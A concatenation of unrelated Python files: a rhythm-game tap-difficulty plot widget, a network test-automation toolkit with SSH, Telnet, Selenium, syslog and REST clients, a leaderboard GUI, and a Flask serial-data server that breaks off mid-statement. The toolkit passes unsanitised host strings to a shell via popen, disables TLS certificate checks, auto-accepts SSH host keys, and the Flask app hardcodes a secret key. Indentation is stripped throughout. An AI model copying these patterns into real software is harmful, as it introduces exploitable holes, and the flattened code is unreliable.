self.__graph_text = pyqtgraph.TextItem('', anchor=(0, 0), )
self.__graph.addItem(self.__graph_text)
# Put it all together
self.__layout = QtGui.QHBoxLayout(self)
self.__layout.setContentsMargins(0, 0, 0, 0)
self.__layout.setSpacing(2)
self.__layout.addWidget(self.__graph)
# Connect signals
self.__calc_data_event.connect(self.__display_data)
self.__graph.sigRangeChanged.connect(self.__on_view_range_changed)
self.__on_view_range_changed()
def plot_data(self, play_data):
if play_data.shape[0] == 0:
return
thread = threading.Thread(target=self.__plot_tap_factors, args=(play_data, ))
thread.start()
def __plot_tap_factors(self, play_data):
# Determine what was the latest play
data_filter = \
(play_data[:, RecData.TIMESTAMP] == max(play_data[:, RecData.TIMESTAMP]))
play_data = play_data[data_filter]
# Filter out sliders holds and releases
data_filter = (
(play_data[:, RecData.ACT_TYPE] != StdScoreData.ACTION_HOLD) & \
(play_data[:, RecData.ACT_TYPE] != StdScoreData.ACTION_RELEASE)
)
play_data = play_data[data_filter]
# Check if there is any data to operate on
if play_data.shape[0] < 3:
data_stub = np.asarray([])
self.__calc_data_event.emit(data_stub, data_stub, data_stub)
return
# Calculate data
toffsets = play_data[:, RecData.T_OFFSETS]
timings = play_data[:, RecData.TIMINGS]
is_miss = (play_data[:, RecData.HIT_TYPE] == StdScoreData.TYPE_MISS)
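        # Note: DT_DEC / DT_INC are delta-time columns, so a decreasing delta-time corresponds
        # to an increasing BPM; the swapped-looking names below appear to be intentional.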
bpm_inc = play_data[:, RecData.DT_DEC]
bpm_dec = play_data[:, RecData.DT_INC]
        score_mask = np.zeros((timings.shape[0] - 2, 3), dtype=bool)
        score_mask[:, 0] = is_miss[2:]
        score_mask[:, 1] = np.abs(toffsets[2:]) <= 32
        score_mask[:, 2] = (np.abs(toffsets[2:]) > 32) & ~is_miss[2:]
rates = 1000/(timings[2:] - timings[:-2])
stamina = np.zeros(rates.shape[0])
stamina_select = (bpm_dec[2:] > bpm_inc[2:])
stamina[stamina_select] = 0.1*(np.log(bpm_inc[2:][stamina_select]/1000 + 1) + 1)
stamina[~stamina_select] = 0.1
data_x = np.linspace(0, 1, rates.shape[0])
data_y = rates*stamina*3
sort_idx = np.argsort(data_y)
data_y = data_y[sort_idx]
score_mask[:, 0] = score_mask[sort_idx, 0]
score_mask[:, 1] = score_mask[sort_idx, 1]
score_mask[:, 2] = score_mask[sort_idx, 2]
self.__calc_data_event.emit(data_x, data_y, score_mask)
def __display_data(self, data_x, data_y, score_mask):
xMin = -0.1
xMax = 1.1
data_x_miss = data_x[score_mask[:, 0]]
data_y_miss = data_y[score_mask[:, 0]]
data_x_perf = data_x[score_mask[:, 1]]
data_y_perf = data_y[score_mask[:, 1]]
data_x_bad = data_x[score_mask[:, 2]]
data_y_bad = data_y[score_mask[:, 2]]
# Set plot data
self.__diff_plot_miss.setData(x=data_x_miss, y=data_y_miss/2, top=data_y_miss/2, bottom=data_y_miss/2, pen=mkPen((200, 0, 0, 200), width=2))
self.__diff_plot_perf.setData(x=data_x_perf, y=data_y_perf/2, top=data_y_perf/2, bottom=data_y_perf/2, pen=mkPen((0, 72, 255, 150), width=2))
self.__diff_plot_bad.setData(x=data_x_bad, y=data_y_bad/2, top=data_y_bad/2, bottom=data_y_bad/2, pen=mkPen((224, 224, 0, 100), width=2))
self.__graph.setLimits(xMin=xMin, xMax=xMax)
self.__graph.setRange(xRange=[ xMin, xMax ])
play_percent = 1 - (data_y_miss.shape[0] + 0.25*data_y_bad.shape[0])/data_y.shape[0]
self.__graph_text.setText(
f"""
Peak difficulty: {data_y[-1]:.2f}
Majority difficulty: {data_y[int(data_y.shape[0]*0.95)]:.2f}
Average difficulty: {data_y.mean():.2f}
Play percentage: {play_percent:.2f}
Play diff estimate: {data_y[int(play_percent*(data_y.shape[0] - 1))]:.2f}
"""
)
def __on_view_range_changed(self, _=None):
view = self.__graph.viewRect()
pos_x = view.left()
pos_y = view.bottom()
margin_x = 0.001*(view.right() - view.left())
margin_y = 0.001*(view.top() - view.bottom())
self.__graph_text.setPos(pos_x + margin_x, pos_y + margin_y)
|
__init__.py
|
import logging
import paramiko
import requests
import asyncio
import aiohttp
import sys
import telnetlib
from io import StringIO
from os import getcwd, chdir, popen
from threading import Thread
from time import sleep
from typing import Any, Dict, List
from socketserver import BaseRequestHandler
from urllib3.exceptions import MaxRetryError
from bps_restpy.bps_restpy_v1.bpsRest import BPS
from selenium import webdriver
from selenium.common.exceptions import TimeoutException, WebDriverException, ElementNotInteractableException, \
InvalidElementStateException, NoSuchElementException, StaleElementReferenceException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.ui import WebDriverWait
# class for context-manager tools such as cd (change directory), ping, etc.
class Tools:
# current working directory
cwd = getcwd()
# exception flag
exc = False
# context manager for changing directory
class cd:
def __init__(self, path: str):
"""
:param path: The path of the directory to change to.
"""
chdir(path)
def __enter__(self):
return self
def __exit__(self, exc_type, value, traceback):
chdir(Tools.cwd)
# context manager for turning prints into string
class to_string:
def __init__(self):
self.old_stdout = sys.stdout
sys.stdout = self.mystdout = StringIO()
def __enter__(self):
return self.mystdout
def __exit__(self, exc_type, value, traceback):
sys.stdout = self.old_stdout
# the IP that can connect to the specified destination, 8.8.8.8 is the default
@staticmethod
def get_ip_address(destination: str = "8.8.8.8") -> Any:
"""
:param destination: The destination ip to reach from the machine
:return: The ip address that can connect to the specified destination
"""
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((destination, 80))
return s.getsockname()[0]
# ping command, returns True/False
@staticmethod
def ping(host: str, timeout: int = 1, tries: int = 2) -> bool:
"""
:param host: can be ip or host name
:param timeout: timeout in seconds, 1 is the minimum
:param tries: number of ping re-tries
:return: True/False
"""
from platform import system
flag = False
try:
assert timeout >= 1 and tries >= 1
except AssertionError:
timeout, tries = 1, 2
print(
"timeout and tries should be more or equal to 1, revert to defaults timeout, tries = 1, 2")
command = f'ping -n 1 -w {timeout * 1000} {host}' if system().lower() == 'windows' else \
f'ping -c 1 -W {timeout} {host}'
for i in range(tries):
response = popen(command).read().lower()
if 'unreachable' not in response and "100%" not in response:
flag = True
break
if Tools.exc and (not flag):
raise Exc.NoPingError
return flag
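    # Hypothetical usage sketch (the address is an example only):
    #     if Tools.ping("192.0.2.1", timeout=2, tries=3):
    #         print("host is reachable")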
# exceptions
class Exc:
class NoPingError(Exception):
pass
class SSHError(Exception):
pass
class TelnetError(Exception):
pass
# class that contain all the automation functions with Chrome.
class Chrome:
"""
Chrome Automation.
"""
def __init__(self, url: str = ""):
"""
:param url: The URL
"""
# Opening Chrome Driver
options = Options()
options.add_experimental_option("prefs", {
"download.default_directory": rf"{Tools.cwd}",
"download.prompt_for_download": False,
"download.directory_upgrade": True,
"safebrowsing.enabled": True
})
options.add_argument('--ignore-certificate-errors')
try:
self.driver = webdriver.Chrome(options=options)
except WebDriverException:
import chromedriver_autoinstaller
chromedriver_autoinstaller.install()
self.driver = webdriver.Chrome(options=options)
self.url(url)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def url(self, url: str):
        # if the url string doesn't contain '://', the next line prepends 'https://',
        # and if the url string is empty the default page is google.com
url = f"{('://' not in url) * 'https://'}{url}{(not url) * 'www.google.com'}"
Tools.ping(url)
try:
self.driver.get(url)
self.driver.fullscreen_window()
except WebDriverException:
print("ERR_CONNECTION_TIMED_OUT")
self.close()
def close(self):
try:
self.driver.close()
self.driver.quit()
except MaxRetryError:
pass
def wait(self, elem: str, delay: int = 10, elem_type: str = By.XPATH) -> bool:
"""
:param elem: The copied element, the element should be in the type that is selected
:param delay: The delay
:param elem_type: The default type is Xpath
:return: True if the element is existing
"""
elem = elem.strip()
flag = True
try:
WebDriverWait(self.driver, delay).until(expected_conditions.presence_of_element_located((elem_type, elem)))
except TimeoutException:
print("Wait False", elem)
flag = False
return flag
def click(self, elem: str, elem_type: str = By.XPATH, tries: int = 3, delay: int = 3) -> bool:
"""
:param elem: The copied Xpath element
:param elem_type: The default type is Xpath
:param tries: tries to click
:param delay: The delay for the wait function
:return: True if click succeeded
"""
flag = True
if self.wait(elem=elem, delay=delay):
elem = elem.strip()
for i in range(tries):
try:
self.driver.find_element(elem_type, elem).click()
break
except (ElementNotInteractableException, InvalidElementStateException, StaleElementReferenceException,
NoSuchElementException):
pass
else:
flag = False
else:
flag = False
return flag
def fill(self, elem: str, text: str, elem_type: str = By.XPATH, enter: bool = False,
tries: int = 3, delay: int = 5) -> bool:
"""
:param elem: The copied Xpath element
:param text:
:param elem_type: The default type is Xpath
:param enter:
:param tries:
:param delay:
:return:
"""
flag = True
if self.wait(elem=elem, delay=delay):
for i in range(tries):
try:
my_elem = self.driver.find_element(elem_type, elem)
my_elem.click()
my_elem.clear()
my_elem.send_keys(text)
if enter:
my_elem.send_keys(Keys.ENTER)
break
except (ElementNotInteractableException, InvalidElementStateException, StaleElementReferenceException,
NoSuchElementException):
                    pass
else:
flag = False
else:
flag = False
return flag
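# Hypothetical usage sketch (URL and XPath are examples only):
#     with Chrome("example.com") as browser:
#         if browser.wait('//*[@id="q"]'):
#             browser.fill('//*[@id="q"]', "search text", enter=True)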
# class for ssh
class SSH:
def __init__(self, host: str, user: str, password: str, port: int = 22, pingf: bool = True):
"""
:param host: host to ssh
:param user: username for the ssh
:param password: password for the ssh
:param port: ssh port
:param pingf: flag to ping
"""
self.host, self.user, self.password, self.port = host, user, password, port
if Tools.ping(self.host) if pingf else True:
self.ssh_connect()
else:
print("invalid host or no ping to host")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def ssh_connect(self):
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
self.ssh.connect(hostname=self.host, port=self.port, username=self.user, password=self.password)
self.channel = self.ssh.invoke_shell()
except (OSError, TimeoutError, AttributeError, paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException):
self.close()
if Tools.exc:
raise Exc.SSHError
except paramiko.ssh_exception.AuthenticationException:
self.close()
print("Username or Password is incorrect")
if Tools.exc:
raise Exc.SSHError
def command(self, command: str, command_sleep: int = 2, recv_buffer: int = 99999999, tries: int = 3) -> Any:
"""
:param command: the command
        :param command_sleep: seconds to wait after sending the command
        :param recv_buffer: the recv command buffer size
        :param tries: the number of times to try to send the command
        :return: the output of the command, or None if no output was ready in time
"""
for i in range(tries):
try:
# Clearing output.
sleep(command_sleep / 6)
if self.channel.recv_ready():
self.channel.recv(recv_buffer)
self.channel.send(f'{command}\n'.encode('ascii'))
sleep(command_sleep)
if self.channel.recv_ready():
return self.channel.recv(recv_buffer).decode("utf-8", 'replace').replace("�", "").split("\n")[1:-1]
except (OSError, TimeoutError, AttributeError, paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException):
self.ssh_connect()
else:
print("ssh_command failed")
def close(self):
self.ssh.close()
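# Hypothetical usage sketch (host and credentials are examples only):
#     with SSH("192.0.2.10", "admin", "secret") as box:
#         lines = box.command("uname -a")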
# class for telnet
class Telnet:
def __init__(self, host: str, user: str, password: str, ask_user: str = "User:", ask_pass: str = "Password:",
cli_sign: str = "#", pingf: bool = True):
"""
:param host: host to telnet
:param user: username for the telnet
:param password: password for the telnet
:param ask_user: Read until a given byte string of the username statement
:param ask_pass: Read until a given byte string of the password statement
:param cli_sign: Read until a given byte string of the cli sign
:param pingf: flag to ping
"""
self.host, self.user, self.password = host, user, password
self.ask_user, self.ask_pass, self.cli_sign = ask_user, ask_pass, cli_sign
self.tn: telnetlib.Telnet
if Tools.ping(self.host) if pingf else True:
self.tel_connect()
else:
print("invalid host or no ping to host")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def tel_connect(self):
try:
self.tn = telnetlib.Telnet()
self.tn.open(self.host)
self.tn.read_until(self.ask_user.encode('ascii'))
self.tn.write(f"{self.user}\n".encode('ascii'))
self.tn.read_until(self.ask_pass.encode('ascii'))
self.tn.write(f"{self.password}\n".encode('ascii'))
self.tn.read_until(self.cli_sign.encode('ascii'), 60)
self.command(" ")
except (TimeoutError, EOFError):
self.close()
if Tools.exc:
raise Exc.TelnetError
def command(self, command: str) -> Any:
"""
:param command: the command
:return: returns the output of the command
"""
try:
self.tn.write(command.encode('ascii') + b"\n")
output = self.tn.read_until(b"#", 60)
return output.decode('utf-8', 'replace').replace("�", "").split("\n")
except AttributeError:
self.tn.write(command.encode('ascii') + b"\n")
output = self.tn.read_until(b"#", 60)
return output.decode('utf-8', 'replace').replace("�", "").split("\n")
except EOFError:
self.close()
if Tools.exc:
raise Exc.TelnetError
def close(self):
self.tn.close()
# class for Syslog Server
class Syslog:
"""
Class for Syslog Server
"""
class SyslogUDPHandler(BaseRequestHandler):
def handle(self):
logging.info(str(bytes.decode(self.request[0].strip())))
def __init__(self, name: str = "syslog.log", ip: str = Tools.get_ip_address(), port: int = 514):
"""
:param name: Syslog log file name
:param ip: The IP address to listen to, the default ip would be the ip that can connect to 8.8.8.8
:param port: The listening port
"""
from socketserver import UDPServer
self.name, self.ip, self.port = name, ip, port
self.server = UDPServer((self.ip, self.port), Syslog.SyslogUDPHandler)
t1 = Thread(target=self.Server)
t1.start()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# Setting the Syslog server
def Server(self):
try:
logging.basicConfig(level=logging.INFO, format='%(asctime)s.%(msecs)03d %(levelname)s:\t%(message)s',
datefmt='%Y-%m-%d %H:%M:%S', filename=self.name,
filemode='a')
self.server.serve_forever(poll_interval=0.5)
except (IOError, SystemExit):
raise
except KeyboardInterrupt:
print("Crtl+C Pressed. Shutting down.")
# Closing the Server and clearing logging handler
def close(self):
# shutting down the server
self.server.shutdown()
# clearing logging handler
        for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
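# Hypothetical usage sketch: the UDP server runs in a background thread until close() is
# called (or the with-block exits), writing incoming messages to the log file.
#     with Syslog(name="syslog.log", port=514):
#         sleep(60)   # collect messages for a minute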
# class for Breaking Point
class BP:
"""
Class for Breaking Point
"""
test_id = ""
def __init__(self, test: str, ip: str, user: str, password: str, slot: int = 0, ports: Any = None):
"""
:param test: Test name
:param ip: BP IP
:param user: BP username
:param password: BP password
:param slot: Slot number of the ports to reserve
:param ports: Ports to reserve as list, example: [1,2]
"""
self.ip, self.user, self.password = ip, user, password
self.bps = BPS(self.ip, self.user, self.password)
if slot:
self.reserve(slot, ports)
if test:
self.start(test)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
@staticmethod
    def LoginDecorator(func):
        # log in before the wrapped call, forward any arguments, and log out afterwards
        def inner(self, *args, **kwargs):
            self.bps.login()
            result = func(self, *args, **kwargs)
            self.bps.logout()
            return result
        return inner
def reserve(self, slot: int, ports: List[int]):
self.bps.reservePorts(slot=slot,
portList=ports,
group=1, force=True)
@LoginDecorator
def start(self, test: str):
"""
:param test: Test name
:return: None
"""
# showing current port reservation state
with Tools.to_string() as output:
self.bps.portsState()
if self.user in output.getvalue():
self.test_id = self.bps.runTest(modelname=test, group=1)
else:
print("No Reserved Ports")
@LoginDecorator
def stop(self, csv: bool = False):
"""
:param csv: Export csv report
:return: None
"""
with Tools.to_string() as output:
self.bps.runningTestInfo()
if output.getvalue():
# stopping test
self.bps.stopTest(testid=self.test_id)
# exporting csv report of the test
if csv:
self.csv(self.test_id)
else:
print("No Running Tests")
def csv(self, test_id: Any):
self.bps.exportTestReport(test_id, "Test_Report.csv", "Test_Report")
def login(self):
self.bps.login()
def logout(self):
self.bps.logout()
# class for Vision API
class API:
"""
Login/Logout/Get/Post/Put/Delete from Vision with REST API
"""
def __init__(self, vision: str, user: str, password: str, ping_timeout: int = 1):
"""
:param vision: Vision IP
:param user: Username
:param password: Password
:param ping_timeout: ping timeout in seconds
"""
self.vision, self.user, self.password = vision, user, password
self.ping_timeout, self.flag = ping_timeout, False
if Tools.ping(vision, ping_timeout) if ping_timeout else True:
self.login()
else:
print("invalid host or no ping to host")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def login(self):
# if self.cookie:
# url = f"https://{self.vision}/mgmt/system/user/logout"
# self.response = requests.post(url, verify=False, cookies=self.cookie)
# if self.response.status_code != 200:
# self.flag = False
if not self.flag:
url = f"https://{self.vision}/mgmt/system/user/login"
fill_json = {"username": self.user, "password": self.password}
self.response = requests.post(url, verify=False, data=None, json=fill_json)
self.cookie = self.response.cookies
            self.flag = "jsessionid" in self.response.text
def url(self, url: str) -> str:
if "://" not in url:
if "/mgmt" in url:
url = f"https://{self.vision}{url}"
else:
url = f"https://{self.vision}/mgmt/device/df{url}"
return url
def get(self, url: str) -> Any:
url = self.url(url)
self.response = requests.get(url, verify=False, data=None, cookies=self.cookie)
return self.response.json()
def post(self, url: str, json: Dict[str, Any]) -> Any:
url = self.url(url)
self.response = requests.post(url, verify=False, data=None, json=json, cookies=self.cookie)
return self.response.json()
def put(self, url: str, json: Dict[str, Any]) -> Any:
url = self.url(url)
self.response = requests.put(url, verify=False, data=None, json=json, cookies=self.cookie)
return self.response.json()
def delete(self, url: str) -> Any:
url = self.url(url)
self.response = requests.delete(url, verify=False, data=None, cookies=self.cookie)
return self.response.json()
def a_get(self, urls):
results = []
headers = {'Cookie': "; ".join([f"{x}={y}" for x, y in self.cookie.items()])}
def get_tasks(session):
tasks = []
for url in urls:
url = self.url(url)
tasks.append(asyncio.create_task(session.get(url, headers=headers, ssl=False)))
return tasks
async def get_responses():
async with aiohttp.ClientSession() as session:
tasks = get_tasks(session)
responses = await asyncio.gather(*tasks)
for response in responses:
results.append(await response.json())
asyncio.run(get_responses())
return results
def close(self):
url = f"https://{self.vision}/mgmt/system/user/logout"
self.response = requests.post(url, verify=False, cookies=self.cookie)
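# Hypothetical usage sketch (address, credentials and resource paths are examples only):
#     with API("198.51.100.5", "admin", "secret") as vision:
#         status = vision.get("/mgmt/some/resource")
#         batch = vision.a_get(["/some/path?count=10", "/other/path?count=10"])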
|
display.py
|
# -*- coding: utf-8 -*-
import PySimpleGUI as sg
import threading
import time
W = 30 # name width
last_correct = 'baniverse'
def open_leaderboard():
while True:
event, value = leaderboard.read()
if event == sg.WIN_CLOSED:
break
leaderboard.close()
def update_leaderboard(players, last):
global last_correct
i = 1
for (k,v) in sorted(players.items(), key=lambda x: -x[1]):
entry = f"{i}. {k.ljust(W-10)} {str(v).rjust(3)}"
leaderboard[i].update(entry)
i+=1
if i > 5:
break
if last:
last_correct = last
leaderboard[0].update(f"{last_correct} ({players[last_correct] if last_correct != 'beginnergo' else '-∞'})".ljust(W))
leaderboard.refresh()
def update_move(coords):
leaderboard['m'].update(coords.ljust(10))
leaderboard.refresh()
sg.theme('DarkPurple') # Add a touch of color
small = {'font': 'Courier 16', 'text_color': 'white'}
medium = {'font': 'Sans-Serif 20', 'text_color': 'white'}
big = {'font': 'Sans-Serif 80', 'text_color': 'white'}
layout = [
[sg.Text(''.ljust(W+10), key=1, **small)],
[sg.Text(''.ljust(W+10), key=2, **small)],
[sg.Text(''.ljust(W+10), key=3, **small)],
[sg.Text(''.ljust(W+10), key=4, **small)],
[sg.Text(''.ljust(W+10), key=5, **small)],
[sg.Text(' ', **small)],
[sg.Text('Last correct answer:', **medium)],
[sg.Text(''.ljust(W+10), key=0, **medium)],
[sg.Text(' ', **small)],
[sg.Text('Last move:', **medium)],
[sg.Text(''.ljust(10), key='m', **big)], ]
leaderboard = sg.Window('Top Players', layout, alpha_channel=0.7)
t = threading.Thread(target=open_leaderboard)
t.start()
time.sleep(1)
|
primary.py
|
#!/usr/bin/env python
#Copyright (c) 2015,2016 Joseph D. Steinmeyer (jodalyst), Jacob White, Nick Arango
#Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#Version 0 of j
#questions? email me at jodalyst@mit.edu
# Based off of Python Flask FAQ field (Miguel is awesome)
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on available packages.
#async_mode = 'threading'
#async_mode = 'eventlet'
async_mode = None
if async_mode is None:
try:
import eventlet
async_mode = 'eventlet'
except ImportError:
pass
if async_mode is None:
try:
from gevent import monkey
async_mode = 'gevent'
except ImportError:
pass
if async_mode is None:
async_mode = 'threading'
print('async_mode is ' + async_mode)
# monkey patching is necessary because this application uses a background
# thread
if async_mode == 'eventlet':
import eventlet
eventlet.monkey_patch()
elif async_mode == 'gevent':
from gevent import monkey
monkey.patch_all()
import time
from threading import Thread, Lock
from flask import Flask, render_template, session, request
from flask_socketio import SocketIO, emit, join_room, leave_room,close_room, rooms, disconnect
import sys
import glob
import serial
import json
import struct
import csv
#Python 3 or above? (Python 3 needs newline='' when opening CSV files)
if sys.version_info[0] > 2:
version3 = True
kwargs = {'newline':''}
else:
version3 = False
kwargs = {}
##import logging
##log = logging.getLogger('werkzeug')
##log.setLevel(logging.ERROR)
serialConnected = False #global flag for whether or not the serial port should be connected
serialPort = 0 # junk init value; holds the serial port object when in use...access protected by serialLock below
serialLock = Lock() #serial permission lock (protects shared resource of serial port)
print (serialLock)
#Taken from here on StackExchange: http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
#Want to give credit where credit is due!
def serial_ports():
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in list(range(256))]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
#print("checking port "+port)
s = serial.Serial(port)
#print("closing port "+port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
#-------------------
#serial variables:
serialselection = ''
baudselection = 115200
mcuMessage = []
'''system_parameters: a dictionary whose keys are user-variable parameter names and whose
entries are lists of [current value (index 0), single-character comm term for conveying the
value back to the micro]...for example you could have system_parameters['K_d']=[1.4,'D']
'''
system_parameters = {}
#params_and_values: an ordered list of the names of parameters, headroom, and values to be plotted
#Used in generating CSV header list in order
params_and_values = []
#A list pointing to parameter values for quick plotting (rather than list-comprehending this every time)
param_vals = []
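#Illustrative sketch (hypothetical values, not taken from a real setup string): a single
#slider named 'K_d' using comm character 'D' and currently set to 1.4 would populate these
#structures roughly as
#   system_parameters = {'K_d': [1.4, 'D']}
#   params_and_values = [<plot names...>, 'Headroom', 'K_d']
#   param_vals        = [1.4]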
command_terms = ['HIHI']
#expected_length...how long each full message from Micro should be
expected_length = 0
#function that will be stored for chopping up the message into appropriately signed/unsigned/float values, etc... makes this processing arbitrarily expandable as needed...must obviously agree with the encoding scheme on the micro
parseFunction = lambda x: [0]
'''Kp = 0.0
Kd = 0.0
Ki = 0.0
direct = 0.0
desired = 0.0
alternate = 0.0 # global flag of whether or not we're alternating...
'''
#ALTERNATING DATA STRUCTURE:
# timer and state are used for storing/remembering the switching action
# period is how often to switch (in seconds)
# param is the user input that is switched (determined during initialization)
alt_data = {'timer': time.time(), 'state':-1.0, 'period': 5, 'param': None} #data structure used to implement alternating behavior
#Start up Flask server:
app = Flask(__name__, template_folder = './',static_url_path='/static')
app.config['SECRET_KEY'] = 'secret!' #shhh don't tell anyone. Is a secret
socketio = SocketIO(app, async_mode = async_mode)
thread = None
#csv variables:
global csv_default
global csv_recent
global current
global archive
csv_st = time.time()
#variable which determines whether a csv is being generated or not.
csv_yn = False #start out not writing csv files
csvLock = Lock()
keepRunning = True #set to True for default
#global setup variables:
#used during initialization of comms/building GUI
isSetup = False
setupString = ""
allGoodFromGUI = False
#Function run in parallel on infinite loop with
#serves as serial listener outside of separate loop
def serialThread():
print ("Starting serial background thread.")
global desired
global serialLock
global csvLock
global serialPort
global system_parameters
global params_and_values
global expected_length
global parseFunction
global param_vals
global csv_default
global csv_recent
global alt_data
global alternate
global isSetup
global setupString
global command_terms
while True:
if serialConnected:
writeUpdates('~',0)
time.sleep(2.0)
serialLock.acquire()
try:
new_setupString = serialPort.readline()
serialPort.flushInput()
except:
print ("initi string reading issue")
serialLock.release()
new_setupString = strip_until_marker(new_setupString)
temp_commands = new_setupString.split('&')
temp_commands = temp_commands[1:-1]
if temp_commands != command_terms: #only reload the gui if the configuration setup string has changed!
command_terms = temp_commands
setupString = new_setupString
temp = setupString.split('&',1)[1]
temp = temp.rsplit('&',1)[0]
setupString = temp
try:#send up to javascript to sort its part out
socketio.emit('startup',setupString,broadcast =True)
except:
print ("failed socket")
                #build structures based on setupString's contents and order
plot_count =0 #used for tallying plots
spaces = [] #used for determining how to chop data string (bytes per var)
s=[] #list of sliders
t=[] #list of temporal plots
h = [] #contains headroom value if that is being plotted
for x in command_terms:
if len(x)>0 and x[0] =='S': #is a slider
slider_vals = x.split('~') #chop string
#next: add key to system_parameters dict of slider name
#entry is starting val (0) and one char value used for comms
system_parameters[slider_vals[1]]=[0,slider_vals[2]]
s.append(slider_vals[1]) #add name of param to s list
#next is to fill in the param_vals list with the current value
param_vals.append(system_parameters[slider_vals[1]][0])
if len(x)>0 and x[0] == 'A': #we are alternating
vals = x.split('~') #split substring
alt_data['period'] = float(vals[2]) #period unpacked
alt_data['param'] = vals[1] #link alternate to selected parameter
if len(x)>0 and x[0]=='T': #we have a temporal plot
plot_vals = x.split('~') #split substring
t.append(plot_vals[1]) #add name to t list
#next line: append list: [num_bytes,signed/unsigned/float,etc..]
spaces.append([int(plot_vals[2][1]),plot_vals[2][0]])
plot_count +=1 #increment plot count
if len(x)>0 and x[0]=='H':
head_vals = x.split('~')
h.append("Headroom")
plot_count +=1 #headroom isn't a "plot" but treated same
if head_vals[1] =='2':
spaces.append([2,'S']) #needed since 16bit int on Arduino
elif head_vals[1] =='4':
spaces.append([4,'F']) #needed since ARM32 Teensy
params_and_values = t+h+s #in order plots, headroom, sliders
expected_length = sum(x[0] for x in spaces)+2 #2 from open/closing byte
#parse_prototype is function that will chop up incoming bytes for sending up to the GUI
def parse_prototype(listo):
new_out = []
current_index=1 #start 1 up because of start byte
for x in range(plot_count):
val = 0
if spaces[x][0] == 1:
if spaces[x][1] == 'S':
val = struct.unpack('b',listo[current_index:current_index+1])[0]
elif spaces[x][1] =='U':
val = struct.unpack('B',listo[current_index:current_index+1])[0]
elif spaces[x][0] == 2:
if spaces[x][1] == 'S':
val = struct.unpack('<h',listo[current_index:current_index+2])[0]
elif spaces[x][1] == 'U':
val = struct.unpack('H',listo[current_index:current_index+2])[0]
elif spaces[x][0] == 4:
if spaces[x][1] == 'F':
val = struct.unpack('f',listo[current_index:current_index+4])[0]
elif spaces[x][1] == 'S':
val = struct.unpack('i',listo[current_index:current_index+4])[0]
new_out.append(val)
current_index += spaces[x][0]
return new_out
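                #Worked example (hypothetical config, not from a real setup string): with
                #spaces = [[2,'S'],[4,'F']] a frame is
                #  [start byte][int16 little-endian][float32][end byte]  -> expected_length = 8
                #and, on a little-endian host, parse_prototype(b'\x00\x10\x27\x00\x00\x80\x3f\xff')
                #would return [10000, 1.0].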
parseFunction = parse_prototype
while not allGoodFromGUI:
time.sleep(1.0)
isSetup = True
else:
inform_dev() #just tell device that we are good
serialLock.acquire()
try:
serialPort.flushInput()
except:
serialLock.release()
for x in s: #reload gui and device
socketio.emit('setup slider',{0:x,1:str(system_parameters[x][0])}, broadcast=True)
#print("Writing %s to be %0.4f" %(system_parameters[x][1],system_parameters[x][0]))
writeUpdates(system_parameters[x][1],system_parameters[x][0])
time.sleep(0.1)
writeUpdates(system_parameters[x][1],system_parameters[x][0])
time.sleep(0.1)
time.sleep(1)
while serialConnected:
serialLock.acquire()
b = serialPort.read(expected_length)
if len(b) != expected_length:
print("expected=%d, actual=%d\n",len(b),expected_length)
new_data = None
if len(b) > 0 and messageRead(b,expected_length):
new_data = parseFunction(b)
if new_data != None:
try:
socketio.emit('note',new_data,broadcast =True)
except:
print ("failed socket")
if csv_yn:
temp_time = [time.time()-csv_st] #time since recording started
csvLock.acquire()
newb_list = temp_time+new_data+[system_parameters[x][0] for x in s]
csv_default.writerow(newb_list)
csv_recent.writerow(newb_list)
csvLock.release()
#elif bytesThere > expected_length:
# try:
# serialPort.flushInput()
# except:
# print ("failure to flush input")
serialLock.release()
time.sleep(0.01)
if alternate == 1:
if time.time()-alt_data['timer'] > alt_data['period']:
print ('Switch to :')
alt_data['timer'] = time.time() #reset timer
poi = alt_data['param'] #param of interest
print(type(system_parameters[poi][0]))
print(system_parameters[poi][0])
system_parameters[poi][0] = system_parameters[poi][0]*-1.0
alt_data['state'] = alt_data.get('state')*-1
writeUpdates(system_parameters[poi][1],system_parameters[poi][0])
try:
